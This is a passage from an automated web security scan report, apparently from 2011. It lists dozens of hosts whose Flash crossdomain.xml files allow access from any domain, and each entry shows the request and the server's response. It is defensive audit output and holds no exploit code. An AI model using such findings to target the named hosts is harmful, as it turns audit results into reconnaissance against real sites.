<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

7.3. http://195.68.160.167/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.167
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.167

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:38 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:55 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:38 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

7.4. http://195.68.160.40/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.40
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.40

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:57 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:57 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

7.5. http://195.68.160.95/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.95
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.95

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:41 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:41 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

7.6. http://a.vimeocdn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.vimeocdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.vimeocdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 23:28:46 GMT
ETag: "157-78810780"
Content-Type: application/xml
Cache-Control: max-age=1990877
Expires: Wed, 18 May 2011 17:04:49 GMT
Date: Mon, 25 Apr 2011 16:03:32 GMT
Content-Length: 343
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.7. http://ad.afy11.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:37:55 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.8. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.9. http://ajax.googleapis.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 25 Apr 2011 21:17:49 GMT
Date: Sun, 24 Apr 2011 21:17:49 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 68752

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.10. http://api.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 25 May 2011 15:17:38 GMT
X-FB-Server: 10.32.72.125
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

7.11. http://api.flickr.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.flickr.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.flickr.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:41:32 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Vary: Accept-Encoding
X-Served-By: www146.flickr.mud.yahoo.com
Cache-Control: private
Content-Length: 265
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

7.12. http://b.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.13. http://beacon.securestudies.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://beacon.securestudies.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.14. http://bs.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.mail.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:29:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:29:05 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.15. http://bs.yandex.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.yandex.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.yandex.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:37 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:30:37 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.16. http://cdn-01.yumenetworks.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn-01.yumenetworks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn-01.yumenetworks.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2
ETag: "182c001-122-454adb8106440"
Accept-Ranges: bytes
Content-Type: application/xml
Age: 121191
Date: Mon, 25 Apr 2011 14:54:12 GMT
Last-Modified: Sun, 17 Aug 2008 20:30:01 GMT
Content-Length: 290
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

7.17. http://click-here-to-listen.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://click-here-to-listen.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: click-here-to-listen.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:54:10 GMT
Server: dg-httpd/5.0.29 (1273399797)
Accept-Ranges: bytes
Connection: close
Content-Type: text/xml
Last-Modified: Mon, 28 Apr 2008 18:04:40 GMT
ETag: "45a737ce-1e1-481611b8"
Content-Length: 481

<cross-domain-policy>

<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
<allow-http-request-headers-from domain="*"
...[SNIP]...
<allow-access-from domain="*.*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*" to-ports="80,443" />
...[SNIP]...

7.18. http://counter.rambler.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://counter.rambler.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: counter.rambler.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:27:04 GMT
Expires: Mon, 25 Apr 2011 14:37:04 GMT
Content-type: text/plain
Content-length: 288
Last-Modified: Mon, 14 Feb 2011 12:33:32 GMT

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" secure="true" />
<allow-ht
...[SNIP]...

7.19. http://d1.openx.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:07:21 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "1bed79-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.20. http://d7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 619922229
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=931
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.21. http://event.adxpose.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302122676000"
Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT
Content-Type: application/xml
Content-Length: 203
Date: Mon, 25 Apr 2011 14:23:41 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

7.22. http://games.mochiads.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://games.mochiads.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: games.mochiads.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Content-Length: 213
Last-Modified: Thu, 21 Oct 2010 04:46:54 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40049
X-Mochi-Source: 10.0.0.238:27050
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-do
...[SNIP]...

7.23. http://goods.adnectar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: goods.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:25 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hYFNKXjmCLwgAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.24. http://goods43.adnectar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://goods43.adnectar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: goods43.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:31:29 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hcFNKXjmCL4qAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.25. http://img.en25.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.en25.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.en25.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 206
Cache-Control: max-age=0
Date: Mon, 25 Apr 2011 14:54:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.26. http://learn.shavlik.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: learn.shavlik.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/xml
Content-Location: http://learn.shavlik.com/crossdomain.xml
Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT
Accept-Ranges: bytes
ETag: "4e3f9ebe2a24ca1:1772"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:16:43 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.27. http://m.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:37:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.28. http://map.media6degrees.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 25 Apr 2011 14:37:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.29. http://mbox5.offermatica.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox5.offermatica.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox5.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1302288767000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 25 Apr 2011 15:13:56 GMT
Connection: close
Last-Modified: Fri, 08 Apr 2011 18:52:47 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

7.30. http://pda.loveplanet.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pda.loveplanet.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:45 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.31. http://pixel.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

7.32. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 26 Apr 2011 14:34:49 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.33. http://pl.yumenetworks.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:48 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Sun, 17 Aug 2008 20:39:50 GMT
ETag: "10d0439-122-454addb2bd180"
Accept-Ranges: bytes
Content-Length: 290
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

7.34. http://player.vimeo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: player.vimeo.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:32 GMT
Server: Apache
Last-Modified: Thu, 07 Apr 2011 23:28:49 GMT
ETag: "3718ce-114-78aece40"
Accept-Ranges: bytes
Content-Length: 276
Cache-Control: max-age=315360000
Expires: Thu, 22 Apr 2021 16:03:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<all
...[SNIP]...

7.35. http://playspal.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://playspal.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: playspal.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 25 Apr 2011 14:54:27 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 23 Nov 2010 09:52:59 GMT
ETag: "9828d2a-68-4ceb8efb"
Accept-Ranges: bytes
Content-Length: 104

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.36. http://pretty.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pretty.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pretty.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:34 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.37. http://r2.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r2.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:54 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.38. http://rbcgaru.hit.gemius.pl/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rbcgaru.hit.gemius.pl
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rbcgaru.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:56 GMT
Expires: Tue, 26 Apr 2011 02:44:56 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT
